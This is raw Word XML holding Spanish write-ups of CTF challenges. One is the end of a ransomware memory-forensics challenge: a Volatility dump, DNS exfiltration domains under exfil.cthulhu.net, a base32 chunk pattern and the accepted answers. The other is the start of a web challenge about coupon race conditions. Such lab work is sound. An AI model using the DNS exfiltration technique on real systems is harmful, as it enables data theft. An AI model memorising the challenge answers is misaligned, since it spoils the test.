      <w:r>
        <w:rPr/>
        <w:t>. Posteriormente encontramos múltiples consultas DNS que contenían información codificada en los nombres de host.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Esto confirmó que el atacante estaba utilizando consultas DNS para transportar información fuera del sistema comprometido.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Segunda respuesta:</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>DNS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>La plataforma la aceptó.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>5. Identificación del dominio malicioso</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Realizamos un volcado de la memoria del proceso 392 mediante </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>windows.memmap --pid 392 --dump</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">El archivo resultante, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>pid.392.dmp</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, permitió buscar cadenas ASCII y UTF-16.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>En la memoria encontramos consultas asociadas con dominios como:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="708"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:hanging="283" w:start="709"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>lunny-webp.exfil.cthulhu.net</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="708"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:hanging="283" w:start="709"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>svh-webp.exfil.cthulhu.net</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="708"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:hanging="283" w:start="709"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>sammy-webp.exfil.cthulhu.net</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="708"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="200"/>
        <w:ind w:hanging="283" w:start="709"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>secret-codex-secret.exfil.cthulhu.net</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">El dominio común utilizado para la exfiltración era </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>exfil.cthulhu.net</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Tercera respuesta:</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>exfil.cthulhu.net</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>La plataforma la aceptó.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>6. Recuperación del secreto del Codex</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>La última pregunta solicitaba recuperar el secreto perdido en el Codex.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Análisis de los datos exfiltrados</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Encontramos referencias al archivo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>C:\Boveda\secret_codex.SECRET</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">, que había sido cifrado como </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>secret_codex.SECRET.catlocked</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Las consultas DNS del archivo seguían el patrón:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>&lt;índice&gt;.&lt;datos-base32&gt;.secret-codex-secret.exfil.cthulhu.net</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Mediante un script de Python identificamos 83 fragmentos numerados consecutivamente, desde el 1 hasta el 83.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Ordenamos los fragmentos y decodificamos sus datos Base32.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Resultado:</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> recuperamos un archivo binario de 2,875 bytes, pero su contenido no era directamente legible.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Recuperación del documento en memoria</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Continuamos investigando las cadenas almacenadas en </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>pid.392.dmp</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">En el desplazamiento hexadecimal </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>0x2ca110</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> encontramos parte del documento original en texto claro.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>El documento tenía un apartado titulado:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>CÓDIGO DE SEGURIDAD — ARMAS SECRETAS DE ROOTCORP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Su contenido explicaba que el código de acceso a las armas secretas había sido almacenado en formato hexadecimal.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>El código recuperado fue:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>5351554944534152454e4f54544f424554525553544544</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Al decodificarlo de hexadecimal a ASCII, obtuvimos:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>SQUIDSARENOTTOBETRUSTED</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Sin embargo, la plataforma rechazó inicialmente la cadena ASCII.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Inspeccionamos entonces la respuesta de </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>/api/state</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">, que indicaba que el formato esperado era </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>«Código Secreto»</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Volvimos al documento original y utilizamos directamente el código hexadecimal, sin transformarlo.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Cuarta respuesta aceptada:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>5351554944534152454e4f54544f424554525553544544</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>7. Resumen de respuestas</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="8714" w:type="dxa"/>
        <w:jc w:val="start"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:top w:w="28" w:type="dxa"/>
          <w:start w:w="28" w:type="dxa"/>
          <w:bottom w:w="28" w:type="dxa"/>
          <w:end w:w="28" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2491"/>
        <w:gridCol w:w="6223"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2491" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:suppressLineNumbers/>
              <w:spacing w:before="0" w:after="200"/>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>Pregunta</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6223" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:suppressLineNumbers/>
              <w:spacing w:before="0" w:after="200"/>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>Respuesta</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2491" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:widowControl w:val="false"/>
              <w:suppressLineNumbers/>
              <w:spacing w:before="0" w:after="200"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>01. Ejecutable malicioso</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6223" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:widowControl w:val="false"/>
              <w:suppressLineNumbers/>
              <w:spacing w:before="0" w:after="200"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="SourceText"/>
              </w:rPr>
              <w:t>SvcHost_Kraken.exe</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2491" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:widowControl w:val="false"/>
              <w:suppressLineNumbers/>
              <w:spacing w:before="0" w:after="200"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>02. Canal de exfiltración</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6223" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:widowControl w:val="false"/>
              <w:suppressLineNumbers/>
              <w:spacing w:before="0" w:after="200"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="SourceText"/>
              </w:rPr>
              <w:t>DNS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2491" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:widowControl w:val="false"/>
              <w:suppressLineNumbers/>
              <w:spacing w:before="0" w:after="200"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>03. Dominio malicioso</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6223" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:widowControl w:val="false"/>
              <w:suppressLineNumbers/>
              <w:spacing w:before="0" w:after="200"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="SourceText"/>
              </w:rPr>
              <w:t>exfil.cthulhu.net</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2491" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:widowControl w:val="false"/>
              <w:suppressLineNumbers/>
              <w:spacing w:before="0" w:after="200"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>04. Secreto del Codex</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6223" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:widowControl w:val="false"/>
              <w:suppressLineNumbers/>
              <w:spacing w:before="0" w:after="200"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="SourceText"/>
              </w:rPr>
              <w:t>5351554944534152454e4f54544f424554525553544544</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>8. Conclusión</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Este desafío demostró la importancia del análisis forense de memoria en investigaciones de ransomware.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Gracias a Volatility 3 y al análisis de cadenas recuperamos evidencia sobre procesos sospechosos, archivos cifrados, dominios de exfiltración y consultas DNS que transportaban información codificada.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>El hallazgo decisivo fue encontrar el documento original del Codex todavía presente en la memoria RAM, lo que permitió recuperar su código de seguridad sin necesidad de descifrar el archivo afectado por el ransomware.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">También aprendimos una lección importante: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>una respuesta puede ser técnicamente correcta y aun así ser rechazada si no respeta el formato esperado por el desafío.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Resultado final: 4/4 preguntas completadas.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
        </w:rPr>
        <w:t>Flag final: pendiente de incorporar al write-up cuando se copie de la plataforma.</w:t>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Heading1"/>
        <w:widowControl/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:beforeAutospacing="0" w:before="0" w:afterAutospacing="0" w:after="200"/>
        <w:jc w:val="start"/>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Write-up | Nozama Store — Pentraze CTF 2026</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Autor:</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> je7remy</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Competencia:</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> Pentraze CTF 2026</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Categoría:</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> Web</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Dificultad:</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> Medium</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Puntuación:</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> 100 puntos</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Vulnerabilidad:</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> Race Condition / Business Logic Flaw</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Estado:</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> Resuelto</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1. Descripción del reto</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Nozama Store</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockQuotation"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>¿Cuántos CuPoNeS puedes usar???</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>El desafío presenta una tienda virtual que permite registrar usuarios, añadir productos al carrito y canjear códigos promocionales.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Entre los productos disponibles se encuentra </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Entrada Final — Sala Dorada</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">, identificada como </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>flag-ticket</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, con un precio de US$1,000.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>El objetivo consiste en adquirir ese producto para obtener la flag.</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2. Reconocimiento</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Se comenzó inspeccionando el código JavaScript incluido en la página principal y consultando el estado de la aplicación.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Durante el análisis se identificaron los siguientes endpoints:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="5669" w:type="dxa"/>
        <w:jc w:val="start"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:top w:w="28" w:type="dxa"/>
          <w:start w:w="28" w:type="dxa"/>
          <w:bottom w:w="28" w:type="dxa"/>
          <w:end w:w="28" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2365"/>
        <w:gridCol w:w="3304"/>
      </w:tblGrid>
      <w:tr>
